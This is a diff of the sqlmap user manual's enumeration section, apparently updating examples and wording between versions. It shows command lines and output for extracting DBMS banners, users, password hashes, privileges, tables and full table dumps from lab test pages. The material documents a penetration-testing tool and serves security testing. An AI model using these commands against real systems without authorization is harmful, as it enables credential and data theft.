         Copyright (c) 1988-2005 Microsoft Corporation
         Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
 
-[hh:mm:15] [INFO] performed 1343 queries in 11 seconds
+[hh:mm:15] [DEBUG] performed 1343 queries in 11 seconds
 web server operating system: Windows 2003 or 2000
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS operating system: Windows 2003 Service Pack 1
@@ -2579,22 +2767,27 @@ parsing library that fetches data from Chip Andrews'
 
      5.7 Enumeration
 
      
 
+
      These options can be used to enumerate the back-end database management
+system information, structure and data contained in the tables. Moreover
+you can run your own SQL statements.
      
+
+
 
      Banner
      
 
-
      Option: -b or --banner
      
+
      Option: -b or --banner
      
 
-
      Most of the modern database management systems have a function or an
-environment variable which returns details on the database managemet
-system version. Sometimes also the operating system where the daemon has
-been compiled on, the operating system architecture, its service pack.
-Usually this function is version() or the @@version
-environment variable.
      
+
      Most of the modern database management systems have a function and/or 
+an environment variable which returns details on the database management
+system version. Also, sometimes it returns the operating system version 
+where the daemon has been compiled on, the operating system architecture, 
+and its service pack. Usually the function is version() and the 
+environment variable @@version.
      
 
 
      Example on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -b -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -b -v 0
 
 banner:    '5.0.67-0ubuntu6'
 
      
@@ -2605,7 +2798,7 @@ banner:    '5.0.67-0ubuntu6'
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b -v 0
 
 banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
 (Ubuntu 4.3.2-1ubuntu11) 4.3.2'
@@ -2617,7 +2810,7 @@ banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -b -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" -b -v 0
 
 banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
 
      
@@ -2628,7 +2821,7 @@ banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -b -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -b -v 0
 
 banner:
 ---
@@ -2645,7 +2838,7 @@ Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
+$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 0 -b
 
 banner:
 ---
@@ -2659,9 +2852,9 @@ Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
 
      
 
 
-
      Current user
      
+
      Session user
      
 
-
      Option: --current-user
      
+
      Option: --current-user
      
 
 
      It is possible to retrieve the database management system's user which is
 effectively performing the query on the database from the web application.
      
@@ -2670,7 +2863,7 @@ effectively performing the query on the database from the web application.
      
 
      
 
      
 
      -python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --current-user -v 0
+python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --current-user -v 0
 
 current user:    'testuser@localhost'
 
      
@@ -2680,7 +2873,7 @@ current user:    'testuser@localhost'
 
 
      Current database
      
 
-
      Option: --current-db
      
+
      Option: --current-db
      
 
 
      It is possible to retrieve the database management system's database the
 web application is connected to.
      
@@ -2689,7 +2882,7 @@ web application is connected to.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --current-db -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --current-db -v 0
 
 current database:    'master'
 
      
@@ -2697,27 +2890,27 @@ current database:    'master'
 
      
 
 
-
      Detect if the DBMS current user is a database administrator
      
+
      Detect if the session user is a database administrator (DBA)
      
 
-
      Option: --is-dba
      
+
      Option: --is-dba
      
 
-
      It is possible to detect if the  database management system session user is
+
      It is possible to detect if the current database management system session user is
 a database administrator.
      
 
 
      Example on a PostgreSQL 8.3.5 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 2
 
 [...]
 back-end DBMS: PostgreSQL
 
 [hh:mm:49] [INFO] testing if current user is DBA
-[hh:mm:49] [INFO] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE 
+[hh:mm:49] [DEBUG] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE 
 usename=CURRENT_USER OFFSET 0 LIMIT 1)) THEN 1 ELSE 0 END)
 [hh:mm:49] [INFO] retrieved: 1
-[hh:mm:50] [INFO] performed 13 queries in 0 seconds
+[hh:mm:50] [DEBUG] performed 13 queries in 0 seconds
 current user is DBA:    'True'
 
      
 
      
@@ -2727,17 +2920,17 @@ current user is DBA:    'True'
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --is-dba -v 1
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" --is-dba -v 2
 
 [...]
 back-end DBMS: Oracle
 
-[16:40:57] [INFO] testing if current user is DBA
-[16:40:58] [INFO] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE 
+[hh:mm:57] [INFO] testing if current user is DBA
+[hh:mm:58] [DEBUG] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE 
 GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65))=CHR(68)||CHR(66)||CHR(65)) 
 THEN 1 ELSE 0 END) FROM DUAL
-[16:40:58] [INFO] retrieved: 1
-[16:40:58] [INFO] performed 13 queries in 0 seconds
+[hh:mm:58] [INFO] retrieved: 1
+[hh:mm:58] [DEBUG] performed 13 queries in 0 seconds
 current user is DBA:    'True'
 
      
 
      
@@ -2746,7 +2939,7 @@ current user is DBA:    'True'
 
 
      Users
      
 
-
      Option: --users
      
+
      Option: --users
      
 
 
      It is possible to enumerate the list of database management system users.
      
 
@@ -2754,7 +2947,7 @@ current user is DBA:    'True'
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --users -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --users -v 0
 
 database management system users [3]:
 [*] postgres
@@ -2767,7 +2960,7 @@ database management system users [3]:
 
 
      Users password hashes
      
 
-
      Options: --passwords and -U
      
+
      Options: --passwords and -U
      
 
 
      It is possible to enumerate the password hashes for each database
 management system user.
      
@@ -2776,7 +2969,7 @@ management system user.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
 
 [*] debian-sys-maint [1]:
     password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892
@@ -2795,7 +2988,7 @@ want to enumerate the password hashes.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --passwords \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --passwords \
   -U sa -v 0
 
 database management system users password hashes:
@@ -2820,29 +3013,19 @@ current user and will retrieve the password hashes for this user.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --passwords \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --passwords \
   -U CU -v 1
 
 [...]
 back-end DBMS: PostgreSQL
 
 [hh:mm:48] [INFO] fetching current user
-[hh:mm:48] [INFO] query: COALESCE(CAST(CURRENT_USER AS CHARACTER(10000)), CHR(32))
 [hh:mm:48] [INFO] retrieved: postgres
-[hh:mm:49] [INFO] performed 62 queries in 0 seconds
 [hh:mm:49] [INFO] fetching database users password hashes for current user
 [hh:mm:49] [INFO] fetching number of password hashes for user 'postgres'
-[hh:mm:49] [INFO] query: SELECT COALESCE(CAST(COUNT(DISTINCT(passwd)) AS CHARACTER(10000)), 
-CHR(32)) FROM pg_shadow WHERE usename=CHR(112)||CHR(111)||CHR(115)||CHR(116)||CHR(103)||
-CHR(114)||CHR(101)||CHR(115)
 [hh:mm:49] [INFO] retrieved: 1
-[hh:mm:49] [INFO] performed 13 queries in 0 seconds
 [hh:mm:49] [INFO] fetching password hashes for user 'postgres'
-[hh:mm:49] [INFO] query: SELECT DISTINCT(COALESCE(CAST(passwd AS CHARACTER(10000)), 
-CHR(32))) FROM pg_shadow WHERE usename=CHR(112)||CHR(111)||CHR(115)||CHR(116)||CHR(103)||
-CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1
 [hh:mm:49] [INFO] retrieved: md5d7d880f96044b72d0bba108ace96d1e4
-[hh:mm:51] [INFO] performed 251 queries in 2 seconds
 database management system users password hashes:
 [*] postgres [1]:
     password hash: md5d7d880f96034b72d0bba108afe96c1e7
@@ -2853,7 +3036,7 @@ database management system users password hashes:
 
 
      Users privileges
      
 
-
      Options: --privileges and -U
      
+
      Options: --privileges and -U
      
 
 
      It is possible to enumerate the privileges for each database management
 system user.
      
@@ -2862,7 +3045,7 @@ system user.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
 
 [hh:mm:25] [WARNING] unable to retrieve the number of privileges for user 'ANONYMOUS'
 [hh:mm:28] [WARNING] unable to retrieve the number of privileges for user 'DIP'
@@ -2931,7 +3114,7 @@ want to enumerate the privileges.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --privileges \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --privileges \
   -U postgres -v 0
 
 database management system users privileges:
@@ -2944,8 +3127,8 @@ database management system users privileges:
 
      
 
 
      As you can see, depending on the user privileges, sqlmap identifies if the
-user is a database management system administrator and show next to the
-username this information.
      
+user is a database management system administrator and shows this information
+next to the username.
      
 
 
      If you provide CU as username it will consider it as an alias for
 current user and will enumerate the privileges for this user.
      
@@ -2954,41 +3137,23 @@ current user and will enumerate the privileges for this user.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --passwords \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --passwords \
   -U CU -v 1
 
 [...]
 back-end DBMS: PostgreSQL
 
 [hh:mm:25] [INFO] fetching current user
-[hh:mm:25] [INFO] query: COALESCE(CAST(CURRENT_USER AS CHARACTER(10000)), CHR(32))
 [hh:mm:25] [INFO] retrieved: postgres
-[hh:mm:25] [INFO] performed 62 queries in 0 seconds
 [hh:mm:25] [INFO] fetching database users privileges for current user
 [hh:mm:25] [INFO] fetching number of privileges for user 'postgres'
-[hh:mm:25] [INFO] query: SELECT COALESCE(CAST(COUNT(DISTINCT(usename)) AS CHARACTER(10000)), 
-CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||CHR(116)||CHR(103)||
-CHR(114)||CHR(101)||CHR(115)
 [hh:mm:25] [INFO] retrieved: 1
-[hh:mm:25] [INFO] performed 13 queries in 0 seconds
 [hh:mm:25] [INFO] fetching privileges for user 'postgres'
 [hh:mm:25] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
 into distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:25] [INFO] query: SELECT COALESCE(CAST((CASE WHEN usecreatedb THEN 1 ELSE 0 END) AS 
-CHARACTER(10000)), CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||
-CHR(116)||CHR(103)||CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1
 [hh:mm:25] [INFO] retrieved: 1
-[hh:mm:25] [INFO] performed 13 queries in 0 seconds
-[hh:mm:25] [INFO] query: SELECT COALESCE(CAST((CASE WHEN usesuper THEN 1 ELSE 0 END) AS 
-CHARACTER(10000)), CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||
-CHR(116)||CHR(103)||CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1
 [hh:mm:25] [INFO] retrieved: 1
-[hh:mm:25] [INFO] performed 13 queries in 0 seconds
-[hh:mm:25] [INFO] query: SELECT COALESCE(CAST((CASE WHEN usecatupd THEN 1 ELSE 0 END) AS 
-CHARACTER(10000)), CHR(32)) FROM pg_user WHERE usename=CHR(112)||CHR(111)||CHR(115)||
-CHR(116)||CHR(103)||CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1
 [hh:mm:25] [INFO] retrieved: 1
-[hh:mm:25] [INFO] performed 13 queries in 0 seconds
 database management system users privileges:
 [*] postgres (administrator) [3]:
     privilege: catupd
@@ -3004,7 +3169,7 @@ management system is Microsoft SQL Server.
      
 
 
      Available databases
      
 
-
      Option: --dbs
      
+
      Option: --dbs
      
 
 
      It is possible to enumerate the list of databases.
      
 
@@ -3012,7 +3177,7 @@ management system is Microsoft SQL Server.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dbs -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --dbs -v 0
 
 available databases [6]:
 [*] master
@@ -3030,18 +3195,18 @@ management system is Oracle.
      
 
 
      Databases tables
      
 
-
      Options: --tables and -D
      
+
      Options: --tables and -D
      
 
 
      It is possible to enumerate the list of tables for all database
-manangement system's databases.
      
+management system's databases.
      
 
 
      Example on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --tables -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --tables -v 0
 
-Database: test
+Database: testdb
 [1 table]
 +---------------------------------------+
 | users                                 |
@@ -3101,10 +3266,10 @@ that you want to enumerate the tables.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --tables \
-  -D test -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --tables \
+  -D testdb -v 0
 
-Database: test
+Database: testdb
 [1 table]
 +---------------------------------------+
 | users                                 |
@@ -3117,7 +3282,7 @@ Database: test
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --tables \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" --tables \
   -D users -v 0
 
 Database: USERS
@@ -3137,49 +3302,49 @@ Database: USERS
 
      
 
 
      Note that on Oracle you have to provide the TABLESPACE_NAME
-instead of the database name, in my example that is users to
-retrieve all tables owned by an Oracle database management system
-user.
      
+instead of the database name. In provided example users was
+used to retrieve all tables owned by an Oracle database management 
+system user.
      
 
 
 
      Database table columns
      
 
-
      Options: --columns, -T and -D
      
+
      Options: --columns, -C, -T and -D
      
 
 
      It is possible to enumerate the list of columns for a specific database
 table.
-This functionality depends on the -T to specify the table name
+This functionality depends on the option -T to specify the table name
 and optionally on -D to specify the database name.
      
 
 
      Example on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns \
-  -T users -D test -v 1
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --columns \
+  -T users -D testdb -v 1
 
 [...]
 back-end DBMS: MySQL >= 5.0.0
 
-[hh:mm:25] [WARNING] missing database parameter, sqlmap is going to use the current 
-database to enumerate table 'users' columns
-[hh:mm:25] [INFO] fetching current database
-[hh:mm:25] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
-[hh:mm:25] [INFO] retrieved: test
-[hh:mm:25] [INFO] performed 34 queries in 0 seconds
-[hh:mm:25] [INFO] fetching columns for table 'users' on database 'test'
-[hh:mm:25] [INFO] fetching number of columns for table 'users' on database 'test'
-[...]
-Database: test
+[hh:mm:20] [INFO] fetching columns for table 'users' on database 'testdb'
+[hh:mm:20] [INFO] fetching number of columns for table 'users' on database 'testdb'
+[hh:mm:20] [INFO] retrieved: 3
+[hh:mm:20] [INFO] retrieved: id
+[hh:mm:20] [INFO] retrieved: int(11)
+[hh:mm:21] [INFO] retrieved: name
+[hh:mm:21] [INFO] retrieved: varchar(500)
+[hh:mm:21] [INFO] retrieved: surname
+[hh:mm:21] [INFO] retrieved: varchar(1000)
+Database: testdb
 Table: users
 [3 columns]
-+---------+-------------+
-| Column  | Type        |
-+---------+-------------+
-| id      | int(11)     |
-| name    | varchar(40) |
-| surname | varchar(60) |
-+---------+-------------+
++---------+---------------+
+| Column  | Type          |
++---------+---------------+
+| id      | int(11)       |
+| name    | varchar(500)  |
+| surname | varchar(1000) |
++---------+---------------+
 
      
 
      
 
      
@@ -3188,7 +3353,7 @@ Table: users
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --columns \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --columns \
   -T users -D master -v 0
 
 Database: master
@@ -3209,7 +3374,7 @@ Table: users
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --columns \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --columns \
   -T users -D public -v 0
 
 Database: public
@@ -3227,8 +3392,8 @@ Table: users
 
      
 
 
      Note that on PostgreSQL you have to provide public or the
-name of a system database because it is not possible to enumerate other
-databases tables, only the tables under the schema that the web
+name of a system database. That's because it is not possible to enumerate 
+other databases tables, only the tables under the schema that the web
 application's user is connected to, which is always public.
      
 
 
      If the database name is not specified, the current database name is used.
      
@@ -3237,36 +3402,70 @@ application's user is connected to, which is always public.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --columns \
   -T users -v 1
 
 [...]
 back-end DBMS: MySQL >= 5.0.0
 
-[hh:mm:13] [WARNING] missing database parameter, sqlmap is going to use the current 
+[hh:mm:45] [WARNING] missing database parameter, sqlmap is going to use the current 
 database to enumerate table 'users' columns
-[hh:mm:13] [INFO] fetching current database
-[hh:mm:13] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
-[hh:mm:13] [INFO] retrieved: test
-[hh:mm:13] [INFO] performed 34 queries in 0 seconds
-[hh:mm:13] [INFO] fetching columns for table 'users' on database 'test'
-[hh:mm:13] [INFO] fetching number of columns for table 'users' on database 'test'
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) 
-FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
-table_schema=CHAR(116,101,115,116)
-[hh:mm:13] [INFO] retrieved: 3
-[hh:mm:13] [INFO] performed 13 queries in 0 seconds
-[...]
-Database: test
+[hh:mm:45] [INFO] fetching current database
+[hh:mm:45] [INFO] retrieved: testdb
+[hh:mm:45] [INFO] fetching columns for table 'users' on database 'testdb'
+[hh:mm:45] [INFO] fetching number of columns for table 'users' on database 'testdb'
+[hh:mm:45] [INFO] retrieved: 3
+[hh:mm:45] [INFO] retrieved: id
+[hh:mm:45] [INFO] retrieved: int(11)
+[hh:mm:46] [INFO] retrieved: name
+[hh:mm:46] [INFO] retrieved: varchar(500)
+[hh:mm:46] [INFO] retrieved: surname
+[hh:mm:46] [INFO] retrieved: varchar(1000)
+Database: testdb
 Table: users
 [3 columns]
-+---------+-------------+
-| Column  | Type        |
-+---------+-------------+
-| id      | int(11)     |
-| name    | varchar(40) |
-| surname | varchar(60) |
-+---------+-------------+
++---------+---------------+
+| Column  | Type          |
++---------+---------------+
+| id      | int(11)       |
+| name    | varchar(500)  |
+| surname | varchar(1000) |
++---------+---------------+
+
      
+
      
+
      
+
+
      You can also provide the -C option to specify the table columns
+name like the one you provided to be enumerated.
      
+
+
      Example on a MySQL 5.0.67 target:
      
+
      
+
      
+
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --columns \
+  -T users -C name -v 1
+
+[...]
+[hh:mm:20] [WARNING] missing database parameter, sqlmap is going to use the current 
+database to enumerate table 'users' columns
+[hh:mm:20] [INFO] fetching current database
+[hh:mm:20] [INFO] retrieved: testdb
+[hh:mm:20] [INFO] fetching columns like 'name' for table 'users' on database 'testdb'
+[hh:mm:20] [INFO] fetching number of columns for table 'users' on database 'testdb'
+[hh:mm:20] [INFO] retrieved: 2
+[hh:mm:20] [INFO] retrieved: name
+[hh:mm:20] [INFO] retrieved: varchar(500)
+[hh:mm:21] [INFO] retrieved: surname
+[hh:mm:21] [INFO] retrieved: varchar(1000)
+Database: testdb
+Table: users
+[2 columns]
++---------+---------------+
+| Column  | Type          |
++---------+---------------+
+| name    | varchar(500)  |
+| surname | varchar(1000) |
++---------+---------------+
 
      
 
      
 
      
@@ -3274,50 +3473,64 @@ Table: users
 
 
      Dump database table entries
      
 
-
      Options: --dump, -C, -T, -D,
---start and --stop
      
+
      Options: --dump, -C, -T, -D,
+--start, --stop, --first
+and --last
      
 
-
      It is possible to dump the entries for a specific database table.
-This functionality depends on the -T to specify the table name
-and optionally on -D to specify the database name.
-If the database name is not specified, the current database name is used.
      
+
      It is possible to dump table entries.
+This functionality depends on the option -T to specify the table
+name or on the option -C to specify the column name and,
+optionally on -D to specify the database name.
      
+
+
      If the table name is specified, but the database name is not, the current
+database name is used.
      
 
 
      Example on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --dump \
   -T users -v 1
 
 [...]
 back-end DBMS: MySQL >= 5.0.0
 
-[hh:mm:13] [WARNING] missing database parameter, sqlmap is going to use the current 
+[hh:mm:41] [WARNING] missing database parameter, sqlmap is going to use the current 
 database to dump table 'users' entries
-[hh:mm:13] [INFO] fetching current database
-[hh:mm:13] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
-[hh:mm:13] [INFO] retrieved: test
-[hh:mm:13] [INFO] performed 34 queries in 0 seconds
-[hh:mm:13] [INFO] fetching columns for table 'users' on database 'test'
-[hh:mm:13] [INFO] fetching number of columns for table 'users' on database 'test'
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) 
-FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
-table_schema=CHAR(116,101,115,116)
-[hh:mm:13] [INFO] retrieved: 3
-[hh:mm:13] [INFO] performed 13 queries in 0 seconds
-[...]
-Database: test
+[hh:mm:41] [INFO] fetching current database
+[hh:mm:41] [INFO] retrieved: testdb
+[hh:mm:41] [INFO] fetching columns for table 'users' on database 'testdb'
+[hh:mm:41] [INFO] fetching number of columns for table 'users' on database 'testdb'
+[hh:mm:41] [INFO] retrieved: 3
+[hh:mm:41] [INFO] retrieved: id
+[hh:mm:41] [INFO] retrieved: name
+[hh:mm:41] [INFO] retrieved: surname
+[hh:mm:41] [INFO] fetching entries for table 'users' on database 'testdb'
+[hh:mm:41] [INFO] fetching number of entries for table 'users' on database 'testdb'
+[hh:mm:41] [INFO] retrieved: 4
+[hh:mm:41] [INFO] retrieved: 1
+[hh:mm:42] [INFO] retrieved: luther
+[hh:mm:42] [INFO] retrieved: blissett
+[hh:mm:42] [INFO] retrieved: 2
+[hh:mm:42] [INFO] retrieved: fluffy
+[hh:mm:42] [INFO] retrieved: bunny
+[hh:mm:42] [INFO] retrieved: 3
+[hh:mm:42] [INFO] retrieved: wu
+[hh:mm:42] [INFO] retrieved: ming
+[hh:mm:43] [INFO] retrieved: 4
+[hh:mm:43] [INFO] retrieved:  
+[hh:mm:43] [INFO] retrieved: nameisnull
+Database: testdb
 Table: users
-[5 entries]
-+----+----------------------------------------------+-------------------+
-| id | name                                         | surname           |
-+----+----------------------------------------------+-------------------+
-| 1  | luther                                       | blissett          |
-| 2  | fluffy                                       | bunny             |
-| 3  | wu                                           | ming              |
-| 4  | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header |
-| 5  | NULL                                         | nameisnull        |
-+----+----------------------------------------------+-------------------+
+[4 entries]
++----+--------+------------+
+| id | name   | surname    |
++----+--------+------------+
+| 1  | luther | blissett   |
+| 2  | fluffy | bunny      |
+| 3  | wu     | ming       |
+| 4  | NULL   | nameisnull |
++----+--------+------------+
 
      
 
      
 
      
@@ -3329,7 +3542,7 @@ that you want to enumerate the entries.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --dump \
   -T users -D master -C surname -v 0
 
 Database: master
@@ -3348,15 +3561,94 @@ Table: users
 
      
 
      
 
+
      If only the column name is specified, sqlmap will enumerate and ask the
+user to dump all databases' tables containing user provided column(s).
+This feature can be useful to identify, for instance, tables containing
+custom application credentials.
      
+
+
      Example on a MySQL 5.0.67 target:
      
+
      
+
      
+
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 --dump \
+  -C "urna"
+
+[...]
+back-end DBMS: MySQL >= 5.0.0
+
+do you want sqlmap to consider provided column(s):
+[1] as LIKE column names (default)
+[2] as exact column names
+> 1
+[hh:mm:08] [INFO] fetching databases with tables containing columns like 'urna'
+[hh:mm:08] [INFO] fetching number of databases with tables containing columns like 
+'urna'
+[hh:mm:08] [INFO] retrieved: 1
+[hh:mm:08] [INFO] retrieved: testdb
+[hh:mm:10] [INFO] fetching tables containing columns like 'urna' in database 'testdb'
+[hh:mm:10] [INFO] fetching number of tables containing columns like 'urna' in 
+database 'testdb'
+[hh:mm:10] [INFO] retrieved: 1
+[hh:mm:10] [INFO] retrieved: users
+[hh:mm:10] [INFO] fetching columns like 'urna' for table 'users' on database 'testdb'
+[hh:mm:10] [INFO] fetching number of columns for table 'users' on database 'testdb'
+[hh:mm:10] [INFO] retrieved: 1
+[hh:mm:10] [INFO] retrieved: surname
+Columns like 'urna' were found in the following databases:
+Database: testdb
+Table: users
+[1 column]
++---------+
+| Column  |
++---------+
+| surname |
++---------+
+
+do you want to dump entries? [Y/n] y
+which database(s)?
+[a]ll (default)
+[testdb]
+[q]uit
+> 
+which table(s) of database 'testdb'?
+[a]ll (default)
+[users]
+[s]kip
+[q]uit
+> 
+[hh:mm:23] [INFO] fetching columns 'surname' entries for table 'users' on 
+database 'testdb'
+[hh:mm:23] [INFO] fetching number of columns 'surname' entries for table 
+'users' on database 'testdb'
+[hh:mm:23] [INFO] retrieved: 4
+[hh:mm:23] [INFO] retrieved: blissett
+[hh:mm:23] [INFO] retrieved: bunny
+[hh:mm:23] [INFO] retrieved: ming
+[hh:mm:23] [INFO] retrieved: nameisnull
+Database: testdb
+Table: users
+[4 entries]
++------------+
+| surname    |
++------------+
+| blissett   |
+| bunny      |
+| ming       |
+| nameisnull |
++------------+
+
      
+
      
+
      
+
 
      sqlmap also stores for each table the dumped entries in a CSV format file.
-You can see the absolute path where it stored the dumped tables entries
+You can see the absolute path where sqlmap stores the dumped tables entries
 by providing a verbosity level greater than or equal to 1.
      
 
 
      Example on a PostgreSQL 8.3.5 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --dump \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --dump \
   -T users -D public -v 1
 
 [...]
@@ -3369,31 +3661,33 @@ Table: users
 | 1  | luther                                       | blissett          |
 | 2  | fluffy                                       | bunny             |
 | 3  | wu                                           | ming              |
-| 4  | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header |
+| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net)   | user agent header |
 | 5  |                                              | nameisnull        |
 +----+----------------------------------------------+-------------------+
 
-[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/
-192.168.1.121/dump/public/users.csv'
+[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/home/inquis/sqlmap/output/
+172.16.213.131/dump/public/users.csv'
 [...]
 
-$ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv 
-"id","name","surname"
